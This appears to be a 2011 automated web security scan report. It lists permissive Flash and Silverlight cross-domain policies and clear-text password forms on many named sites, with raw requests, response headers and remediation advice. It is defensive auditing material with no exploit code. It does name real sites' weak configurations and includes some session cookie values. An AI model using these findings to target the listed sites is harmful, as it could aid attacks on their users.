The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: developers.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 Connection: close Content-Length: 1581
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: friendfeed.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:49:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 321 Vary: Cookie Server: FriendFeedServer/0.1 Etag: "d69a789b2865b15041af5e97e97c7b933b34666a" Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=9279066392190907013_1296946152; Domain=.friendfeed.com; Path=/
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: geo.yahoo.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:48:41 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 05 Feb 2011 19:02:26 GMT Expires: Sun, 06 Feb 2011 19:02:26 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 9977 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: messenger.yahoo.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/x-httpd-php
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: multiply.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX19SPjRxOe1rQKRUhZatqSHTVwUlBeBnB-hm4X.cCUH0Pw%3d%3d:mgkwrbaa8gcoowdw3utv5rp; domain=multiply.com; path=/ Set-Cookie: session=1296946703:1296946703:1296946703:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: session=1296946703::1296946703:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE" Expires: Wed, 13 Apr 2005 10:02:00 GMT Pragma: no-cache Cache-Control: max-age=0 Content-Type: text/html; charset=utf-8 X-Cache: MISS from multiply.com Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: officedepot.shoplocal.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 18 Jan 2011 23:05:52 GMT Accept-Ranges: bytes ETag: "0c8ae4064b7cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Content-Length: 5172 Date: Sat, 05 Feb 2011 22:58:22 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: posterous.com
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 05 Feb 2011 22:58:38 GMT
Content-Type: text/xml
Content-Length: 293
Last-Modified: Wed, 01 Dec 2010 02:16:37 GMT
Connection: close
Expires: Mon, 07 Mar 2011 22:58:38 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:01:19 GMT
Content-Length: 1581
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.amazon.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:01:33 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.arto.com
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 18 Jan 2011 10:00:07 GMT
Accept-Ranges: bytes
ETag: "8ce4477cf6b6cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:01:07 GMT
Connection: close
Content-Length: 959
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.bebo.com
Response
HTTP/1.0 200 OK
Server: Resin/3.0.24
ETag: "GVbY6cyl+Xo"
Last-Modified: Wed, 17 Mar 2010 18:37:48 GMT
Content-Type: text/xml
Content-Length: 798
Date: Sat, 05 Feb 2011 23:01:30 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.box.net
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 05 Feb 2011 23:01:34 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Fri, 28 Jan 2011 03:09:12 GMT
ETag: "18b1628-436-4d423358"
Accept-Ranges: bytes
Content-Length: 1078
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.hyves.nl
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:02:25 GMT
Content-Type: text/xml
Content-Length: 264
Last-Modified: Fri, 27 Aug 2010 08:58:52 GMT
Connection: close
Expires: Sat, 05 Feb 2011 23:02:24 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.netlog.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:52 GMT
Server: Apache/2.2.14
Cache-Control: max-age=3600
Expires: Sun, 06 Feb 2011 00:02:52 GMT
Last-Modified: Sat, 05 Feb 2011 23:02:52 GMT
Vary: Accept-Encoding
Content-Length: 324
Connection: close
Content-Type: text/xml; charset=UTF-8
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com
Response
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 05 Feb 2011 23:02:57 GMT
Content-Type: text/xml
Connection: close
X-Men: 34
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.newsvine.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:57 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:55 GMT
ETag: "119c048-191-492fdc74df9c0"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=992
Connection: close
Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.nowpublic.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:57 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n31), rf-ht iad-agg-n31 ( origin>CONN)
ETag: "1cc885c-10b-45dc07a6e5e00"-gzip
Cache-Control: max-age=900
Expires: Sat, 05 Feb 2011 23:17:57 GMT
Age: 0
Content-Length: 267
Content-Type: application/xml
Last-Modified: Thu, 11 Dec 2008 07:39:36 GMT
Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.vodafone.de
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:41:00 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2007 15:51:45 GMT
Accept-Ranges: bytes
Content-Length: 309
P3P: CP="NOI DSP LAW CURa OUR NOR PUR COM NAV INT STA"
Vary: User-Agent
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: faves.com
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 05 Feb 2011 22:49:11 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 207
Connection: Close
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="bluedot.us" /></cross-domain-
...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com
Response
HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:02:39 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws30
Set-Cookie: ljuniq=8aewGz0beafsS0b:1296946959:pgstats0:m0; expires=Wednesday, 06-Apr-2011 23:02:39 GMT; domain=.livejournal.com; path=/
Last-Modified: Fri, 18 Jun 2010 18:14:49 GMT
ETag: "da9476-238-48951ee3a5840"
Accept-Ranges: bytes
Content-Length: 568
Connection: close
Content-Type: text/xml
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.de.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 18:54:04 GMT
Date: Sat, 05 Feb 2011 21:49:03 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com
Response
HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 07 Feb 2011 13:40:00 GMT
Date: Sun, 06 Feb 2011 13:40:00 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.redcated
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 312
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:6e7"
Connection: close
Date: Sat, 05 Feb 2011 22:47:12 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: enterprisemediagroup.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 13:21:54 GMT
Server: Omniture DC/2.0.0
xserver: www146
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.blackberry.com
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 13:32:29 GMT
Server: Omniture DC/2.0.0
xserver: www9
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: msdn.microsoft.com
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 22:58:27 GMT
Connection: keep-alive
Content-Length: 339
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.redcated
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Wed, 09 Feb 2011 10:29:32 GMT
Date: Sun, 06 Feb 2011 13:22:29 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: www91.intel.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:36:49 GMT
Server: Omniture DC/2.0.0
xserver: www652
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: ziffdavisbaseline.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 13:21:31 GMT
Server: Omniture DC/2.0.0
xserver: www121
Connection: close
Content-Type: text/html
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: d.ligatus.com
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1167-1291379570000"
Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT
Content-Type: application/xml
Content-Length: 1167
Date: Sun, 06 Feb 2011 17:44:28 GMT
Connection: close
Server: Apache
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: officedepot.shoplocal.com
Response
HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 24 Feb 2010 18:37:08 GMT
Accept-Ranges: bytes
ETag: "0a2895e80b5ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 950
Date: Sat, 05 Feb 2011 22:58:22 GMT
Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438359342200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:02:43 GMT
Connection: keep-alive
Content-Length: 572
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /rmb-account/login-page HTTP/1.1
Host: channelmarketing.owneriq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:46:51 GMT
Server: Apache/2.2.14 (Fedora)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14989
GET / HTTP/1.1
Host: fussballmania.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
GET /en_US/hh/home_index.do HTTP/1.1
Host: hhonors1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://hhonors1.hilton.com/en_US/hh/home_index.do
The form contains the following password field:
password
Request
GET /en_US/hh/home_index.do HTTP/1.1
Host: hhonors1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:58:23 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
